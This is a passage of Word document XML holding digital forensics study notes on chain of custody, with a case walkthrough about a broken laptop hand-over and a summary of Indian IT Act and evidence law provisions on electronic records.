        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why does it matter?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital data is easy to change and copy. In court, the other side will ask: “How do you know this is the same data that was taken from my client’s computer, and that nobody tampered with it?” A proper chain of custody is the answer.</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Benefit</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Explanation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Accountability</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Everyone who touched the evidence is known and responsible.</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Traceability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location of the evidence is known at every point in time.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Integrity support</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that the evidence was kept under control and protected.</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Legal defensibility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If a gap or doubt appears, the evidence may be rejected or lose its value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fields in a chain-of-custody form</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Information recorded</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Case number &amp; evidence ID</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Which case, and a unique number for each item</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Description</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Make, model, serial number, capacity, visible condition of the item</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Collected by / date &amp; time / place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Who took it, exactly when and from where</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Hash values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MD5 / SHA-1 / SHA-256 of the image or file, recorded at acquisition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Seal and packaging details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Seal number, bag type, tamper-evident tape, photographs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Transfer log</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Each hand-over: from whom, to whom, date/time, signature, reason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Storage location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Evidence locker, room, cabinet — with access control</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Final disposition</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Returned to owner, retained by court, or securely destroyed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How to maintain it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Give every item a unique ID and label it immediately at the scene.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Photograph the item and its surroundings before moving it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Seal it in tamper-evident packaging and record the seal number.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record every hand-over in the transfer log, with signatures, date and time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Store the original in a locked, access-controlled evidence room; work only on verified copies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record hash values at acquisition and again whenever the image is used or moved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What can break the chain of custody?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A transfer that was never written down.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Not knowing who held the evidence during a certain period (an unexplained time gap).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unauthorised access to the evidence room or evidence files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Changing the evidence without documenting it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mismatching hash values with no explanation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Case walkthrough — The missing laptop hand-over</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Situation:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> On 5 March, security officer A seizes a laptop from a resigned employee’s desk, tags it EV-01, seals the bag (seal no. 4471) and notes MD5/SHA-1 values after imaging.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Hand-over:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> At 6:00 pm A hands the sealed bag to forensic examiner B, who signs the transfer log. B stores it in the evidence locker.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Problem:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Two days later, the lab notes that the bag’s seal is numbered 4472, and the log shows no entry for 6 March, 2:00 pm to 8:00 pm.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> The opposing lawyer can argue that the laptop may have been accessed in that gap. Even if nothing was changed, the court may give the evidence less weight or reject it.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Lesson:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Record every movement, check seals on every hand-over, and explain any irregularity immediately in writing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.8 Legal and Ethical Aspects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital forensics works at the meeting point of technology and law. The law decides </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">who may collect evidence, how it may be collected, and whether a court will accept it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. An investigator who ignores the law can make excellent technical findings that are useless in court — or even commit an offence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Technology Act, 2000 — relevant sections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364"/>
        <w:gridCol w:w="3509"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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35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Subject</w:t>
            </w:r>
          </w:p>
        </w:tc>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 it matters in forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Penalty and compensation for damage to computer, computer system etc. (unauthorised access, downloading, introducing viruses, denial of service)</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Basis for civil claims in hacking, data theft and malware cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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65</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Tampering with computer source documents — up to 3 years and fine up to ₹2 lakh</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Deleting or altering source code or logs that must be kept by law</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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66</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Computer-related offences (Section 43 acts done dishonestly or fraudulently) — up to 3 years and/or fine up to ₹5 lakh</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Main criminal section for hacking and unauthorised access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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66C / 66D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Identity theft; cheating by personation using a computer resource</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Phishing, fake profiles, stolen credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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67 / 67A / 67B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Publishing obscene, sexually explicit material or child sexual abuse material electronically</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Content-related investigations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Government powers to intercept, monitor or decrypt information</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Lawful interception; shows that surveillance needs legal authority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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70B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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CERT-In as national incident-response agency</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Incident reporting duties of organisations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Intermediary liability (safe harbour for platforms that follow due diligence)</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Requests to ISPs, social media and platforms for data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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79A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Central Government may notify an “Examiner of Electronic Evidence”</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Gives official recognition to forensic experts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Power of police (Inspector rank or above) to enter, search and arrest without warrant in public places for offences under the Act</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Search and seizure powers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Indian Evidence Act — electronic records</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In India, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">electronic records are admissible as evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but only if certain conditions are satisfied. Under the old Indian Evidence Act, 1872, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 65B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> said that a computer output (printout, CD, pen drive copy) is admissible as a document only when it comes with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">certificate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> describing how the record was produced and confirming that the computer was working properly. The Supreme Court held in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Anvar P.V. v. P.K. Basheer (2014)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that this certificate is mandatory for secondary electronic evidence, and confirmed this again in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Arjun Panditrao Khotkar v. Kailash Gorantyal (2020)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Indian Evidence Act has now been replaced by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bharatiya Sakshya Adhiniyam (BSA), 2023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which carries forward this idea in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 63</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, with a prescribed certificate format that is signed by the person in charge of the device and by an expert. For your exam, remember the idea (certificate for electronic evidence) and the section name your syllabus uses (65B); also mention the new Act.</w:t>
      </w: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Exam tip</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Write: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
